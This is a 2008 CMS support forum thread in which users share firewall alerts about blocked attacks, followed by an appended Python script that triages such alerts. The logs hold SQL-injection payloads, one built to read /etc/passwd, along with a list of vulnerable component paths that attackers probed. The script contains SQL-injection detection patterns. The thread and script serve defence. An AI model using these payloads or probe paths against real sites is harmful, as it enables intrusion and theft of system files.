Elxis CMS Forum

Support => Security => Topic started by: CREATIVE Options on August 31, 2008, 13:14:34

Title: New session of attacks have started.
Post by: CREATIVE Options on August 31, 2008, 13:14:34
New attacks from several IPs have started.

There have recently been several attempts to hack websites that I manage.
Thanks to Elxis Defender and some custom work I did, all the websites were found to be SAFE after the attempts.

Here is a list of the attempts:
Elxis Defender blocked an attack to your site

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI: /?\';DECLARE @S CHAR(4000);SET @S=CAST(0x[...] AS CHAR(4000));EXEC(@S);
DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_chronocontact/excelwriter/PPS/File.php
DATE: 31-08-2008 07:20:52

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_mosmedia/media.divs.php
DATE: 31-08-2008 06:49:46

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_wmtportfolio/admin.wmtportfolio.php
DATE: 31-08-2008 03:34:14

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_sitemap/sitemap.xml.php
DATE: 31-08-2008 02:03:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_jcs/view/history.php
DATE: 30-08-2008 23:43:20

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_smf/smf.php
DATE: 30-08-2008 23:25:28

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_mosmedia/includes/purchase.html.php
DATE: 30-08-2008 23:19:39

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_mp3_allopass/allopass-error.php
DATE: 30-08-2008 22:42:33

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_thopper/inc/responses_type.php
DATE: 30-08-2008 22:23:49

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_slideshow/admin.slideshow1.php
DATE: 30-08-2008 20:41:53

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_jcs/view/register.php
DATE: 30-08-2008 20:09:05

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_peoplebook/param.peoplebook.php
DATE: 30-08-2008 20:03:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /components/com_moodle/moodle.php
DATE: 30-08-2008 19:35:51

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_mosmedia/includes/credits.html.php
DATE: 30-08-2008 19:26:40

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /modules/MambWeather/Savant2/Savant2_Plugin_options.php
DATE: 30-08-2008 18:57:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php
DATE: 30-08-2008 18:41:11

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_jcs/jcs.function.php
DATE: 30-08-2008 17:51:06

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI: /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php
DATE: 30-08-2008 16:21:40


Conclusion:
All users MUST enable Elxis Defender with ALL the filters ON (you can find the basic list of filters for Elxis Defender inside the Elxis Defender options).
Go to Tools -> Elxis Defender -> and fill in ALL Example Filters

These options can protect you from almost all attempts to attack your website.
Some people will say: "Yes, OK, I will enable all this, but my website will be slower."

My answer to this question is simple: "You have the option to move your website to a better hosting provider and you will be sure that you are secure and you will not lose your data from your website".

Also, if you look at the targets of the attack attempts, they are for other CMSs. Once again I would like to say: DO NOT use modules, mambots or components that are not verified by the Elxis Team; use ONLY those from the Elxis Download Center.


*Modification to add more
Title: Re: New session of attacks have started.
Post by: Ivan Trebješanin on August 31, 2008, 15:14:34
There are multiple attacks from the same IP in your list. You should enable blocking of the attacker's IP.
Title: Re: New session of attacks have started.
Post by: nikos65 on September 04, 2008, 22:24:19
New attack !!! Safe with Elxis Defender  ;D

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 70.110.158.71 (blocked)
Requested URI: /index.php?option=1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--
DATE: 04-09-2008 11:12:11
Attack was logged
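
Added example, not part of the original thread and not Elxis Defender's own code: a small triage script for alerts in the layout quoted above. It parses each alert, expands SQL `char(...)` calls so the hidden string is readable, labels the request, and lists IPs that recur often enough to block. The sample alerts, the documentation-range IPs, the `com_example` paths and the threshold of 3 are constructed assumptions.

```python
import re
from collections import Counter
# Constructed sample alerts in the layout quoted in this thread (documentation IPs).
SAMPLE = """\
ATTACKER IP ADDRESS: 203.0.113.10
Requested URI: /components/com_example/example.php
DATE: 30-08-2008 20:41:53
ATTACKER IP ADDRESS: 203.0.113.10
Requested URI: /administrator/components/com_example/admin.example.php
DATE: 30-08-2008 23:19:39
ATTACKER IP ADDRESS: 203.0.113.10
Requested URI: /modules/Example/Example_Plugin.php
DATE: 31-08-2008 02:03:43
ATTACKER IP ADDRESS: 198.51.100.7 (blocked)
Requested URI: /index.php?option=1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--
DATE: 04-09-2008 11:12:11
"""

ALERT = re.compile(
    r"ATTACKER IP ADDRESS:\s*(?P<ip>[\d.]+)[^\n]*\n"
    r"Requested URI:\s*(?:Code: \[Select\]\s*)?(?P<uri>.*?)\s*"
    r"DATE:\s*(?P<date>\d{2}-\d{2}-\d{4} \d{2}:\d{2}:\d{2})", re.S)
CHAR_CALL = re.compile(r"char\(([\d,\s]+)\)", re.I)
SQLI = re.compile(r"union\s+(all\s+)?select|declare\s+@|exec\s*\(|load_file", re.I)

def decode_char(uri):
    """Expand SQL char(n,n,...) calls so the hidden string is readable in triage."""
    def expand(m):
        return "'" + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + "'"
    return CHAR_CALL.sub(expand, uri)

def parse_alerts(text):
    """One dict per alert; also accepts DATE fused onto the end of the URI line."""
    alerts = []
    for m in ALERT.finditer(text):
        uri = decode_char(m.group("uri"))
        kind = "sqli" if SQLI.search(uri) else "component-probe"
        alerts.append({"ip": m.group("ip"), "date": m.group("date"), "kind": kind, "uri": uri})
    return alerts

def block_candidates(alerts, threshold=3):
    """IPs with at least `threshold` alerts (threshold is an assumed policy value)."""
    hits = Counter(a["ip"] for a in alerts)
    return sorted(ip for ip, n in hits.items() if n >= threshold)

if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE)
    print(*parsed, sep="\n")
    print("block candidates:", block_candidates(parsed))
```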